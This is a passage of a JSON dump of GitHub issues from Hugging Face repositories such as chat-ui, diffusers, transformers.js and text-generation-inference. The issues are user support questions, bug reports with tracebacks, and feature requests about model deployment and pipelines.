    "body": "I run `chat-ui` with the `chat-ui-db` docker image. I would like to connect it to my Azure OpenAI API endpoint.\r\nI have setup the `env.local` file as stated in your docs and binded it with the docker container:\r\n\r\n```bash\r\nMODELS=`[{\r\n  \"id\": \"gpt-4-1106-preview\",\r\n  \"name\": \"gpt-4-1106-preview\",\r\n  \"displayName\": \"gpt-4-1106-preview\",\r\n  \"parameters\": {\r\n      \"temperature\": 0.5,\r\n      \"max_new_tokens\": 4096,\r\n  },\r\n  \"endpoints\": [\r\n      {\r\n          \"type\": \"openai\",\r\n          \"baseURL\": \"https://{resource-name}.openai.azure.com/openai/deployments/{deployment-id}/chat/completions\",\r\n          \"defaultHeaders\": {\r\n              \"api-key\": \"{api-key}\"\r\n          },\r\n          \"defaultQuery\": {\r\n              \"api-version\": \"{api-version}\"\r\n          }\r\n      }\r\n  ]\r\n}]`\r\n```\r\n\r\nWhen sending a message in `chat-ui`, I get a message `404 Resource Not Found` on the top right of the interface.\r\nWhen I manually send an HTTP request to the Azure OpenAI API endpoint with the same parameters, I get a valid response.\r\nHow can I solve this?",
    "url": "https://github.com/huggingface/chat-ui/issues/1309",
    "state": "open",
    "labels": [
      "support"
    ],
    "created_at": "2024-06-26T07:16:54Z",
    "updated_at": "2024-06-26T18:53:51Z",
    "comments": 2,
    "user": "gqoew"
  },
  {
    "repo": "huggingface/chat-ui",
    "number": 1308,
    "title": "Warning: To load an ES module in Azure environment",
    "body": "Hi Team,\r\n\r\nWe are currently facing issues deploying our Chat UI solution in Azure Web App. The error encountered in the console log is as follows:\r\n\r\n```\r\nnpm http fetch GET 200 https://registry.npmjs.org/npm 141ms\r\n(node:124) Warning: To load an ES module, set \"type\": \"module\" in the package.json or use the .mjs extension.\r\n(Use `node --trace-warnings ...` to show where the warning was created)\r\n/home/site/wwwroot/node_modules/.bin/vite:2\r\nimport { performance } from 'node:perf_hooks'\r\n^^^^^^\r\n\r\nSyntaxError: Cannot use import statement outside a module\r\n    at internalCompileFunction (node:internal/vm:77:18)\r\n    at wrapSafe (node:internal/modules/cjs/loader:1288:20)\r\n    at Module._compile (node:internal/modules/cjs/loader:1340:27)\r\n    at Module._extensions..js (node:internal/modules/cjs/loader:1435:10)\r\n    at Module.load (node:internal/modules/cjs/loader:1207:32)\r\n    at Module._load (node:internal/modules/cjs/loader:1023:12)\r\n    at Function.executeUserEntryPoint [as runMain] (node:internal/modules/run_main:135:12)\r\n    at node:internal/main/run_main_module:28:49\r\n\r\nNode.js v20.11.1\r\nnpm notice \r\nnpm notice New minor version of npm available! 10.5.0 -> 10.8.1\r\nnpm notice Changelog: https://github.com/npm/cli/releases/tag/v10.8.1\r\nnpm notice Run npm install -g npm@10.8.1 to update!\r\nnpm notice \r\n```\r\n\r\n\r\nIt appears to be a Node.js issue, and I believe there might be an error in my package.json configuration. I have tried using both Node.js 18 and 20 without success.\r\n\r\nCould you please provide me with the correct configuration for package.json to resolve this issue?\r\n\r\n\r\n",
    "url": "https://github.com/huggingface/chat-ui/issues/1308",
    "state": "open",
    "labels": [
      "support"
    ],
    "created_at": "2024-06-26T06:04:45Z",
    "updated_at": "2024-06-27T09:07:35Z",
    "comments": 3,
    "user": "pronitagrawalvera"
  },
  {
    "repo": "huggingface/transformers.js",
    "number": 823,
    "title": "How to export q4f16.onnx ",
    "body": "### Question\r\n\r\nThanks for providing such a great project, but I have a problem converting the model.\r\n\r\n\r\n```\r\nFor example:  \r\nmodel_q4f16.onnx\r\n```\r\n\r\n\r\nWhat command is used to create and export such a q4/f16.onnx model?\r\nCan you give me more tips or help? Thank you",
    "url": "https://github.com/huggingface/transformers.js/issues/823",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2024-06-26T05:36:47Z",
    "updated_at": "2024-06-26T07:46:57Z",
    "user": "juntaosun"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 8700,
    "title": "[PAG] add `StableDiffusionXLControlNetPAGImg2ImgPipeline`",
    "body": "We recently integrated PAG into diffusers! See the PR here: https://github.com/huggingface/diffusers/pull/7944\r\n\r\nDoes anyone want to add a `StableDiffusionXLControlNetPAGImg2ImgPipeline`?\r\n1. You should put it under the [pag folder](https://github.com/huggingface/diffusers/tree/main/src/diffusers/pipelines/pag)\r\n2. you can use the implementation of [`StableDiffusionXLControlNetPAGPipeline`](https://github.com/huggingface/diffusers/blob/main/src/diffusers/pipelines/pag/pipeline_pag_controlnet_sd_xl.py) and [`StableDiffusionXLPAGImg2ImgPipeline`](https://github.com/huggingface/diffusers/blob/main/src/diffusers/pipelines/pag/pipeline_pag_sd_xl_img2img.py) as reference\r\n3. you need to add AutoPipeline so that you can use this API to create it\r\n    ```python\r\n       AutoPipelineForImage2Image.from_pretrained(repo_id, controlnet=controlnet, enable_pag=True ...)\r\n   ```\r\n4. tests and docs \r\n",
    "url": "https://github.com/huggingface/diffusers/issues/8700",
    "state": "closed",
    "labels": [
      "good first issue",
      "help wanted",
      "contributions-welcome"
    ],
    "created_at": "2024-06-25T18:52:18Z",
    "updated_at": "2024-08-21T17:24:23Z",
    "comments": 6,
    "user": "yiyixuxu"
  },
  {
    "repo": "huggingface/sentence-transformers",
    "number": 2779,
    "title": "what is the default tokenizer when \"No sentence-transformers model found with name\"?",
    "body": "I'm trying to use the sentence-transformer dangvantuan/sentence-camembert-large model and I'm getting a \"no model found\" error. This error is probably because some Sentence-Transformers-specific files are missing in their Huggingface (modules.json and config_sentence_transformers.json). \r\nBut then, Sentence Transformer warns it will create a new model with mean pooling, and this model performs really well on my data (!). \r\nSo, I would like to know what the tokeniser's model is when the model name hasn't been found? ",
    "url": "https://github.com/huggingface/sentence-transformers/issues/2779",
    "state": "closed",
    "labels": [],
    "created_at": "2024-06-25T15:17:58Z",
    "updated_at": "2024-07-05T10:42:27Z",
    "user": "Hortatori"
  },
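The fallback described in sentence-transformers#2779 above can be written out explicitly: when no `modules.json` is found, the library builds the checkpoint's own Hugging Face tokenizer plus mean pooling over token embeddings. A sketch of the equivalent explicit construction:

```python
from sentence_transformers import SentenceTransformer, models

# What SentenceTransformer builds implicitly for a plain HF checkpoint:
word = models.Transformer("dangvantuan/sentence-camembert-large")
pooling = models.Pooling(
    word.get_word_embedding_dimension(), pooling_mode="mean"
)
model = SentenceTransformer(modules=[word, pooling])

# The tokenizer is just the AutoTokenizer of the underlying checkpoint.
print(type(word.tokenizer))
```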
  {
    "repo": "huggingface/accelerate",
    "number": 2891,
    "title": "How to set a custom Config in python code using Accelerate?",
    "body": "Hello everyone!\r\n\r\nCould you please advise how to replace the console command for setting a config\r\n```\r\naccelerate launch --config_file {path/to/config/my_config_file.yaml} {script_name.py} {--arg1} {--arg2}\r\n```\r\nwith code in the Python file script_name.py?\r\n\r\nI am expecting something like the following functionality:\r\n```\r\nfrom accelerate import Accelerator\r\naccelerator = Accelerator()\r\naccelerator.set_config_file('path/to/config/my_config_file.yaml')\r\n```\r\n\r\nI would like to run the script through Python and use all the benefits of launching with the Accelerate launch command with config file:\r\n```\r\npython script_name.py\r\n```\r\n",
    "url": "https://github.com/huggingface/accelerate/issues/2891",
    "state": "closed",
    "labels": [],
    "created_at": "2024-06-25T11:56:10Z",
    "updated_at": "2024-10-07T15:08:01Z",
    "user": "konstantinator"
  },
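For accelerate#2891 above: the YAML file is consumed by the `accelerate launch` process launcher, not by the `Accelerator` object, so there is no `set_config_file` equivalent. Per-run options go to the constructor, and the process topology goes to a launcher. A sketch using `notebook_launcher`; the two-process count and constructor arguments are illustrative:

```python
from accelerate import Accelerator, notebook_launcher

def training_loop():
    # Fields from the YAML such as mixed_precision or gradient
    # accumulation can be passed straight to the constructor;
    # num_processes / multi-GPU fields belong to the launcher.
    accelerator = Accelerator(
        mixed_precision="bf16", gradient_accumulation_steps=2
    )
    accelerator.print(f"running on {accelerator.device}")

# Rough in-code equivalent of `accelerate launch --num_processes 2 script.py`:
notebook_launcher(training_loop, num_processes=2)
```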
  {
    "repo": "huggingface/diffusers",
    "number": 8693,
    "title": "SD3 + SDXL refine fix lying on grass. How to do in diffusers colab workflow?",
    "body": "this is comfy workflow \r\n![GQQC1T-aUAAXRDI](https://github.com/huggingface/diffusers/assets/151509142/15e3c420-3e14-4476-8a1a-4001934af158)\r\n\r\nhow can i do in diffusers colab workflow?",
    "url": "https://github.com/huggingface/diffusers/issues/8693",
    "state": "closed",
    "labels": [
      "stale"
    ],
    "created_at": "2024-06-25T07:30:55Z",
    "updated_at": "2024-09-23T11:37:25Z",
    "user": "s9anus98a"
  },
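A rough diffusers equivalent of the two-stage Comfy workflow asked about in diffusers#8693: generate with SD3, then pass the result through the SDXL refiner as img2img at low strength so the composition survives while details are fixed. Model ids and the strength value are illustrative, not taken from the workflow image.

```python
import torch
from diffusers import StableDiffusion3Pipeline, StableDiffusionXLImg2ImgPipeline

prompt = "photo of a woman lying on grass"

base = StableDiffusion3Pipeline.from_pretrained(
    "stabilityai/stable-diffusion-3-medium-diffusers", torch_dtype=torch.float16
).to("cuda")
image = base(prompt, num_inference_steps=28).images[0]

refiner = StableDiffusionXLImg2ImgPipeline.from_pretrained(
    "stabilityai/stable-diffusion-xl-refiner-1.0", torch_dtype=torch.float16
).to("cuda")
refined = refiner(
    prompt,
    image=image,
    strength=0.3,  # low strength: keep composition, refine details
).images[0]
refined.save("sd3_refined.png")
```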
  {
    "repo": "huggingface/text-generation-inference",
    "number": 2113,
    "title": "how to launch a service using downloaded model weights?",
    "body": "### System Info\r\n\r\nI have downloaded model weights of bge-models, and I want to launch a model service using TGI, the command is :\r\n```\r\nmodel=/storage/nfs2/ModelHub/embedding/BAAI/bge-small-zh-v1.5\r\nrevision=refs/pr/5\r\nvolume=$PWD/data # share a volume with the Docker container to avoid downloading weights every run\r\n\r\ndocker run --gpus all \\\r\n-p 3001:3001 -v $volume:/data text-embeddings-inference:1.2 \\\r\n--model-id $model --port 3001 --revision $revision\r\n```\r\nbut I got the follwing error:\r\n\r\n```\r\n2024-06-25T03:13:34.201754Z  INFO text_embeddings_router: router/src/main.rs:140: Args { model_id: \"BAA*/***-*****-**-v1.5\", revision: Some(\"refs/pr/5\"), tokenization_workers: None, dtype: None, pooling: None, max_concurrent_requests: 512, max_batch_tokens: 16384, max_batch_requests: None, max_client_batch_size: 32, auto_truncate: false, hf_api_token: None, hostname: \"54903bb17567\", port: 3001, uds_path: \"/tmp/text-embeddings-inference-server\", huggingface_hub_cache: Some(\"/data\"), payload_limit: 2000000, api_key: None, json_output: false, otlp_endpoint: None, cors_allow_origin: None }\r\n2024-06-25T03:13:34.201950Z  INFO hf_hub: /root/.cargo/git/checkouts/hf-hub-1aadb4c6e2cbe1ba/b167f69/src/lib.rs:55: Token file not found \"/root/.cache/huggingface/token\"\r\n2024-06-25T03:13:36.546198Z  INFO download_artifacts: text_embeddings_core::download: core/src/download.rs:20: Starting download\r\nError: Could not download model artifacts\r\n\r\nCaused by:\r\n    0: request error: error sending request for url (https://huggingface.co/BAAI/bge-large-zh-v1.5/resolve/refs%2Fpr%2F5/config.json): error trying to connect: Connection reset by peer (os error 104)\r\n    1: error sending request for url (https://huggingface.co/BAAI/bge-large-zh-v1.5/resolve/refs%2Fpr%2F5/config.json): error trying to connect: Connection reset by peer (os error 104)\r\n    2: error trying to connect: Connection reset by peer (os error 104)\r\n    3: Connection reset by peer (os error 104)\r\n    4: Connection reset by peer (os error 104)\r\n```\r\nIt seems to download model from huggingface but I want to use my private model weight.\r\nmy privatre weight:\r\n\r\n```\r\n>> ls /storage/nfs2/ModelHub/embedding/BAAI/bge-small-zh-v1.5\r\n1_Pooling                          model.safetensors  README.md                  tokenizer_config.json\r\nconfig.json                        modules.json       sentence_bert_config.json  tokenizer.json\r\nconfig_sentence_transformers.json  pytorch_model.bin  special_tokens_map.json    vocab.txt\r\n```\r\n\r\n\r\n### Information\r\n\r\n- [X] Docker\r\n- [ ] The CLI directly\r\n\r\n### Tasks\r\n\r\n- [X] An officially supported command\r\n- [ ] My own modifications\r\n\r\n### Reproduction\r\n\r\ndocker run --gpus all \\\r\n-p 3001:3001 -v $volume:/data text-embeddings-inference:1.2 \\\r\n--model-id $model --port 3001 --revision $revision\r\n\r\n### Expected behavior\r\n\r\nluanch the service successfully",
    "url": "https://github.com/huggingface/text-generation-inference/issues/2113",
    "state": "closed",
    "labels": [],
    "created_at": "2024-06-25T03:18:14Z",
    "updated_at": "2024-06-28T03:50:10Z",
    "user": "chenchunhui97"
  },
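For the text-embeddings-inference question above: the container only sees paths mounted into it, so the usual fix is to mount the local weights under `/data` and pass the container-side path as `--model-id`, dropping `--revision` (which only applies to Hub downloads). A shell sketch against the paths from the issue:

```shell
# Mount the local weights into the container's /data, then point
# --model-id at the path as seen from inside the container.
docker run --gpus all -p 3001:3001 \
    -v /storage/nfs2/ModelHub/embedding/BAAI/bge-small-zh-v1.5:/data/bge-small-zh-v1.5 \
    text-embeddings-inference:1.2 \
    --model-id /data/bge-small-zh-v1.5 --port 3001
```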
  {
    "repo": "huggingface/chat-ui",
    "number": 1302,
    "title": "Assistant feature: Send user query as part of template variable GET request",
    "body": "Trying to integrate RAG as an assistant. Thinking of using a template variable that makes a GET request (with the prompt as the request body), to get the relevant documents as context. Is this possible (i.e. there is a special variable in the system prompt page for the user query), or is there a better way of doing this?",
    "url": "https://github.com/huggingface/chat-ui/issues/1302",
    "state": "closed",
    "labels": [],
    "created_at": "2024-06-24T22:27:02Z",
    "updated_at": "2025-01-02T12:09:23Z",
    "comments": 2,
    "user": "ethayu"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 8683,
    "title": "Why do Diffusers schedulers produce lower quality outputs compared to ComfyUI?",
    "body": "### Discussed in https://github.com/huggingface/diffusers/discussions/8682\r\n\r\nOriginally posted by **nducthang** June 24, 2024\r\nHi,\r\n\r\nI'm encountering an issue when comparing the quality of ComfyUI and Diffusers. I've noticed that the output of Diffusers is consistently lower than ComfyUI in many cases, despite using the same settings and seed. For the base Diffusers, I've utilized: https://github.com/huggingface/diffusers/blob/main/examples/community/lpw_stable_diffusion_xl.py.\r\n\r\nUpon closer inspection, I've identified differences in the scheduler/ksampler between the two base codes. I've also observed variations in CLIP Embedding between the two base codes, but in my experiments, this hasn't significantly impacted the output. The main issue seems to lie with the KSampler.\r\n\r\nHas anyone else encountered this issue or have any ideas on improving the Scheduler algorithm of Diffusers?\r\n\r\nHere are some prompts I've experimented:\r\nModel: RVXL - Size: (896, 1152)\r\nPositive prompt:\r\n```\r\nfemale, attractive woman, pretty middle-aged woman, thick hair, (((Caucasian, European, Scandinavian female))), ((hazel eyes, HazelEyed)). (Brunette (Light-Brown-Hair)), ((((long rectangular face, elongated face, oblong face shape, angular chiseled face)), ((wide jaw, big strong chin)))). (((1980s magazine advertisement. Living room. CRT Televesion. 1980s aesthetic. 1980s interior design.))) [object Object] . high quality, dim lighting, soft lighting, sharp focus, f5.6, dslr, High Detail, detailed, ((wide shot))\r\n```\r\nNegative prompt:\r\n```\r\n(((male))), (small chin, receding-chin, puffy face), (((Asian, Chinese, Korean, Japanese, Indian, Pakistani, Black, African, Persian, Arab, Middle Eastern, Hispanic, Latino))), (small chin, receding-chin, puffy face), (blurry), (BadDream:1.2), (UnrealisticDream:1.2), ((bad-hands-5)), (strabismus, cross-eyed:1.2), (signature, watermark, name), (worst quality, poor quality, low quality), ((deformed)), (extra limbs), (extra arms), (extra legs), disfigured, malformed, (nude:1.4), (naked:1.4), (nsfw:1.4), (bikini:1.4), (lingerie:1.4), (underwear:1.4), (teen:1.4), (tween:1.4), (teenage:1.4), (kid:1.6), (child:1.6), (topless, shirtless:1.4), (((greyscale))), (cleavage:1.2), (nipples:1.4)\r\n```",
    "url": "https://github.com/huggingface/diffusers/issues/8683",
    "state": "closed",
    "labels": [],
    "created_at": "2024-06-24T14:37:19Z",
    "updated_at": "2024-06-25T06:06:12Z",
    "comments": 20,
    "user": "nducthang"
  },
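Much of a ComfyUI/Diffusers gap of this kind usually traces to sampler settings rather than the model weights. A sketch of aligning the Diffusers scheduler with a KSampler choice, assuming ComfyUI was run with a dpmpp_2m/karras sampler (the flags are illustrative, not a verified one-to-one match):

```python
import torch
from diffusers import StableDiffusionXLPipeline, DPMSolverMultistepScheduler

pipe = StableDiffusionXLPipeline.from_pretrained(
    "stabilityai/stable-diffusion-xl-base-1.0", torch_dtype=torch.float16
).to("cuda")

# from_config keeps the pipeline's scheduler config and overrides only the
# flags passed here; these approximate ComfyUI's "dpmpp_2m" + "karras".
pipe.scheduler = DPMSolverMultistepScheduler.from_config(
    pipe.scheduler.config, use_karras_sigmas=True, algorithm_type="dpmsolver++"
)
```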
  {
    "repo": "huggingface/alignment-handbook",
    "number": 174,
    "title": "Question about torch_dtype when runnging run_orpo.py",
    "body": "I have been using `run_orpo.py` with my personal data successfully. However, as I use it, I have a question.\r\n\r\nWhen I look at the code for `run_orpo.py`, I see that there is a code to match torch_dtype to the dtype of the pretrained model. However, when I actually train and save the model, even if the pretrained model's dtype was `bf16`, it gets changed to `fp32`. Why is this happening?",
    "url": "https://github.com/huggingface/alignment-handbook/issues/174",
    "state": "closed",
    "labels": [],
    "created_at": "2024-06-23T08:28:02Z",
    "updated_at": "2024-07-30T05:05:03Z",
    "comments": 6,
    "user": "sylee96"
  },
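Mixed-precision trainers generally keep master weights in fp32, which is why the saved checkpoint no longer matches the pretrained dtype. A minimal sketch of recovering a bf16 checkpoint after training; the paths are placeholders:

```python
import torch
from transformers import AutoModelForCausalLM

# Reload the fp32 checkpoint in bf16 and re-save it; roughly halves disk size.
model = AutoModelForCausalLM.from_pretrained(
    "path/to/orpo-output", torch_dtype=torch.bfloat16  # placeholder path
)
model.save_pretrained("path/to/orpo-output-bf16")  # placeholder path
```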
  {
    "repo": "huggingface/diffusers",
    "number": 8666,
    "title": "Attention api changes no documentation ? ",
    "body": "how can i see ur previous changes on attention ? \r\n\r\nu have rename`` _slice_size , _sliced_attention and _attention``  attribute from attention \r\n\r\nneed to know what are alternative using of its ? ",
    "url": "https://github.com/huggingface/diffusers/issues/8666",
    "state": "closed",
    "labels": [],
    "created_at": "2024-06-23T07:08:58Z",
    "updated_at": "2024-06-23T11:31:47Z",
    "comments": 4,
    "user": "xalteropsx"
  },
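The private `_slice_size`/`_sliced_attention`/`_attention` members were absorbed into the attention-processor refactor; at the pipeline level the public entry point for slicing is shown below, in a sketch assuming a standard Stable Diffusion pipeline:

```python
from diffusers import StableDiffusionPipeline

pipe = StableDiffusionPipeline.from_pretrained("runwayml/stable-diffusion-v1-5")

# Public replacement for the old private slicing attributes:
pipe.enable_attention_slicing()   # or enable_attention_slicing("max") / an int slice size
pipe.disable_attention_slicing()  # restore full (unsliced) attention
```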
  {
    "repo": "huggingface/transformers.js",
    "number": 819,
    "title": "Blog on walkthrough with transformers js",
    "body": "### Question\n\nHey, So I am writing this blog part of sharing knowledge in a blog series called Running AI/ML in the client. I am using transformer js example walkthrough in this part to validate some concepts. Can I get some feedback before it goes live? How do we connect?",
    "url": "https://github.com/huggingface/transformers.js/issues/819",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2024-06-23T06:06:42Z",
    "updated_at": "2024-06-27T19:10:05Z",
    "user": "ArijitCloud"
  },
  {
    "repo": "huggingface/trl",
    "number": 1763,
    "title": "What is the difference between PPOv2Trainer and PPOTrainer?",
    "body": "What is the difference between PPOv2Trainer and PPOTrainer?  And in trl\\examples\\scripts\\ppo\\ppo.py and trl\\examples\\scripts\\ppo.py , there are two dpo.py files, can you tell me what is different between them?",
    "url": "https://github.com/huggingface/trl/issues/1763",
    "state": "closed",
    "labels": [],
    "created_at": "2024-06-22T14:48:38Z",
    "updated_at": "2024-08-24T09:25:52Z",
    "user": "mst272"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 8649,
    "title": "SD3 - num_images_per_prompt no longer honoured (throws error)",
    "body": "### Describe the bug\n\nWith models prior to SD3, the parameter num_images_per_prompt is honoured, enabling generation of several images per prompt. With sd3-medium an error is generated.\r\nRuntimeError: Sizes of tensors must match except in dimension 1. Expected size 2 but got size 1 for tensor number 1 in the list.\r\nNote: I have insufficient VRAM to run tests without clearing text_encoder_3 and tokenizer_3 and am not sure how to use the \r\nsd3_medium_incl_clips_t5xxlfp8.safetensors variant in a normal diffusers workflow.  It is always possible that clearing the T5-xxl has a side-effect of breaking num_images_per_prompt.\n\n### Reproduction\n\n```\r\nimport torch\r\nfrom diffusers import StableDiffusion3Pipeline\r\n\r\npipe = StableDiffusion3Pipeline.from_pretrained(\r\n    \"stabilityai/stable-diffusion-3-medium-diffusers\",\r\n    text_encoder_3=None,\r\n    tokenizer_3=None,\r\n    torch_dtype=torch.float16\r\n)\r\npipe.to(\"cuda\")\r\n\r\nimage = pipe(\r\n    \"A cat holding a sign that says hello world\",\r\n    negative_prompt=\"\",\r\n    num_inference_steps=28,\r\n    num_images_per_prompt=2,\r\n    guidance_scale=7.0,\r\n).images[0]\r\nimage.save(\"sd3_hello_world-no-T5.png\")\r\n```\n\n### Logs\n\n```shell\nTraceback (most recent call last):\r\n  File \"/home/developer/src/hug_test_txt2img_sd3.py\", line 12, in \r\n    image = pipe(\r\n  File \"/usr/local/lib/python3.10/dist-packages/torch/utils/_contextlib.py\", line 115, in decorate_context\r\n    return func(*args, **kwargs)\r\n  File \"/usr/local/lib/python3.10/dist-packages/diffusers/pipelines/stable_diffusion_3/pipeline_stable_diffusion_3.py\", line 778, in __call__\r\n    ) = self.encode_prompt(\r\n  File \"/usr/local/lib/python3.10/dist-packages/diffusers/pipelines/stable_diffusion_3/pipeline_stable_diffusion_3.py\", line 413, in encode_prompt\r\n    prompt_embeds = torch.cat([clip_prompt_embeds, t5_prompt_embed], dim=-2)\r\nRuntimeError: Sizes of tensors must match except in dimension 1. Expected size 2 but got size 1 for tensor number 1 in the list.\n```\n\n\n### System Info\n\n- \ud83e\udd17 Diffusers version: 0.29.0\r\n- Platform: Linux-6.8.0-35-generic-x86_64-with-glibc2.35\r\n- Running on a notebook?: No\r\n- Running on Google Colab?: No\r\n- Python version: 3.10.12\r\n- PyTorch version (GPU?): 2.3.1+cu121 (True)\r\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\r\n- Jax version: not installed\r\n- JaxLib version: not installed\r\n- Huggingface_hub version: 0.23.4\r\n- Transformers version: 4.41.2\r\n- Accelerate version: 0.31.0\r\n- PEFT version: 0.11.1\r\n- Bitsandbytes version: not installed\r\n- Safetensors version: 0.4.3\r\n- xFormers version: 0.0.27+133d7f1.d20240619\r\n- Accelerator: NVIDIA GeForce RTX 3060, 12288 MiB VRAM\r\n- Using GPU in script?: yes\r\n- Using distributed or parallel set-up in script?: no\r\n\n\n### Who can help?\n\n_No response_",
    "url": "https://github.com/huggingface/diffusers/issues/8649",
    "state": "closed",
    "labels": [
      "bug"
    ],
    "created_at": "2024-06-20T11:28:22Z",
    "updated_at": "2024-06-29T13:05:28Z",
    "comments": 4,
    "user": "zagglez"
  },
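One untested workaround sketch, assuming the size mismatch comes from the zero-filled T5 embeddings not being duplicated per image when `text_encoder_3` is dropped: batch the prompt list so both embedding paths see the same batch size.

```python
import torch
from diffusers import StableDiffusion3Pipeline

pipe = StableDiffusion3Pipeline.from_pretrained(
    "stabilityai/stable-diffusion-3-medium-diffusers",
    text_encoder_3=None,
    tokenizer_3=None,
    torch_dtype=torch.float16,
).to("cuda")

# Batch the prompt instead of using num_images_per_prompt, so the zero-filled
# T5 embeddings are created with the same batch size as the CLIP embeddings.
images = pipe(
    prompt=["A cat holding a sign that says hello world"] * 2,
    negative_prompt=[""] * 2,
    num_inference_steps=28,
    guidance_scale=7.0,
).images
```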
  {
    "repo": "huggingface/transformers.js",
    "number": 814,
    "title": "Consultation on the use of the library with chatbot models",
    "body": "### Question\n\nHello, Greetings Vladimir, programmer in a web environment with PHP, JS, AJAX, first I apologize for my English, my native language is Latin Spanish, I am not very good at writing it, I have used a translator, I wanted to consult, how can I use this interesting and useful tool, to be able to create a chatbot that can respond with personalized information from PDFs, the query is more like using the library, how to use the models both from Hugging Face and downloaded from the script that you share in the documentation and which models would be the most useful for this task considering that you will have to speak in Spanish, I remain attentive",
    "url": "https://github.com/huggingface/transformers.js/issues/814",
    "state": "open",
    "labels": [
      "question"
    ],
    "created_at": "2024-06-20T03:24:34Z",
    "updated_at": "2024-07-29T10:47:24Z",
    "user": "mate07"
  },
  {
    "repo": "huggingface/optimum",
    "number": 1912,
    "title": "Could you provide the official onnx model of Qwen-VL-Chat(-Int4)?",
    "body": "### Feature request\n\nQwen-VL-Chat(-Int4) is useful to image-to-text model.\n\n### Motivation\n\nThe image-to-text LMM model just like Qwen-VL-Chat(-Int4) is very useful.\n\n### Your contribution\n\nNot yet.",
    "url": "https://github.com/huggingface/optimum/issues/1912",
    "state": "open",
    "labels": [
      "feature-request",
      "quantization"
    ],
    "created_at": "2024-06-19T08:43:58Z",
    "updated_at": "2024-10-09T07:52:54Z",
    "comments": 0,
    "user": "yzq1990"
  },
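For architectures Optimum already covers, the export is a single call; Qwen-VL would need a custom ONNX config, which is effectively what this request asks for. A sketch of the standard path, with gpt2 standing in for a supported model:

```python
from optimum.onnxruntime import ORTModelForCausalLM

# export=True converts the PyTorch checkpoint to ONNX on load; Qwen-VL is not
# among the supported architectures yet, so gpt2 is used here for illustration.
model = ORTModelForCausalLM.from_pretrained("gpt2", export=True)
model.save_pretrained("gpt2-onnx")
```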
  {
    "repo": "huggingface/diffusers",
    "number": 8626,
    "title": "More thorough guidance for multiple IP adapter images/masks and a single IP Adapter",
    "body": "### Describe the bug\r\n\r\nI'm trying to use a single IP adapter with multiple IP adapter images and masks. This section of the docs gives an example of how I could do that: https://huggingface.co/docs/diffusers/v0.29.0/en/using-diffusers/ip_adapter#ip-adapter-masking\r\n\r\nThe docs provide the following code:\r\n```python\r\nfrom diffusers.image_processor import IPAdapterMaskProcessor\r\n\r\nmask1 = load_image(\"https://huggingface.co/datasets/huggingface/documentation-images/resolve/main/diffusers/ip_mask_mask1.png\")\r\nmask2 = load_image(\"https://huggingface.co/datasets/huggingface/documentation-images/resolve/main/diffusers/ip_mask_mask2.png\")\r\n\r\noutput_height = 1024\r\noutput_width = 1024\r\n\r\nprocessor = IPAdapterMaskProcessor()\r\nmasks = processor.preprocess([mask1, mask2], height=output_height, width=output_width)\r\n\r\npipeline.load_ip_adapter(\"h94/IP-Adapter\", subfolder=\"sdxl_models\", weight_name=[\"ip-adapter-plus-face_sdxl_vit-h.safetensors\"])\r\npipeline.set_ip_adapter_scale([[0.7, 0.7]])  # one scale for each image-mask pair\r\n\r\nface_image1 = load_image(\"https://huggingface.co/datasets/huggingface/documentation-images/resolve/main/diffusers/ip_mask_girl1.png\")\r\nface_image2 = load_image(\"https://huggingface.co/datasets/huggingface/documentation-images/resolve/main/diffusers/ip_mask_girl2.png\")\r\n\r\nip_images = [[face_image1, face_image2]]\r\n\r\nmasks = [masks.reshape(1, masks.shape[0], masks.shape[2], masks.shape[3])]\r\n\r\ngenerator = torch.Generator(device=\"cpu\").manual_seed(0)\r\nnum_images = 1\r\n\r\nimage = pipeline(\r\n    prompt=\"2 girls\",\r\n    ip_adapter_image=ip_images,\r\n    negative_prompt=\"monochrome, lowres, bad anatomy, worst quality, low quality\",\r\n    num_inference_steps=20,\r\n    num_images_per_prompt=num_images,\r\n    generator=generator,\r\n    cross_attention_kwargs={\"ip_adapter_masks\": masks}\r\n).images[0]\r\n```\r\n\r\nOne important point that should be highlighted is that images/scales/masks must be _lists of lists_ , otherwise we get the following error: `Cannot assign 2 scale_configs to 1 IP-Adapter`. 
\r\n\r\nThat error message is intuitive enough, however this gets confusing in other sections of the documentation, such as the `set_ip_adapter_scale()` function:\r\n```python\r\n# To use original IP-Adapter\r\nscale = 1.0\r\npipeline.set_ip_adapter_scale(scale)\r\n\r\n# To use style block only\r\nscale = {\r\n    \"up\": {\"block_0\": [0.0, 1.0, 0.0]},\r\n}\r\npipeline.set_ip_adapter_scale(scale)\r\n\r\n# To use style+layout blocks\r\nscale = {\r\n    \"down\": {\"block_2\": [0.0, 1.0]},\r\n    \"up\": {\"block_0\": [0.0, 1.0, 0.0]},\r\n}\r\npipeline.set_ip_adapter_scale(scale)\r\n\r\n# To use style and layout from 2 reference images\r\nscales = [{\"down\": {\"block_2\": [0.0, 1.0]}}, {\"up\": {\"block_0\": [0.0, 1.0, 0.0]}}]\r\npipeline.set_ip_adapter_scale(scales)\r\n```\r\n\r\nIs it possible to use the style and layout from 2 reference images _with a single IP Adapter_?\r\nI tried doing something like the following, which _builds on the knowledge of needing to use a list of lists_:\r\n```python\r\n# List of lists to support multiple images/scales/masks with a single IP Adapter\r\nscales = [[{\"down\": {\"block_2\": [0.0, 1.0]}}, {\"up\": {\"block_0\": [0.0, 1.0, 0.0]}}]]\r\npipeline.set_ip_adapter_scale(scales)\r\n\r\n# OR\r\n\r\n# Use layout and style from InstantStyle for one image, but also use a numerical scale value for the other\r\nscale = {\r\n    \"down\": {\"block_2\": [0.0, 1.0]},\r\n    \"up\": {\"block_0\": [0.0, 1.0, 0.0]},\r\n}\r\npipeline.set_ip_adapter_scale([[0.5, scale]])\r\n```\r\n\r\nbut I get the following error:\r\n```\r\nTypeError: unsupported operand type(s) for *: 'dict' and 'Tensor'\\n\r\nAt:\r\n /usr/local/lib/python3.10/dist-packages/diffusers/models/attention_processor.py(2725): __call__\r\n/usr/local/lib/python3.10/dist-packages/diffusers/models/attention_processor.py(549): forward\r\n/usr/local/lib/python3.10/dist-packages/torch/nn/modules/module.py(1527): _call_impl\r\n/usr/local/lib/python3.10/dist-packages/torch/nn/modules/module.py(1518): _wrapped_call_impl\\n  /usr/local/lib/python3.10/dist-packages/diffusers/models/attention.py(366): forward\\n  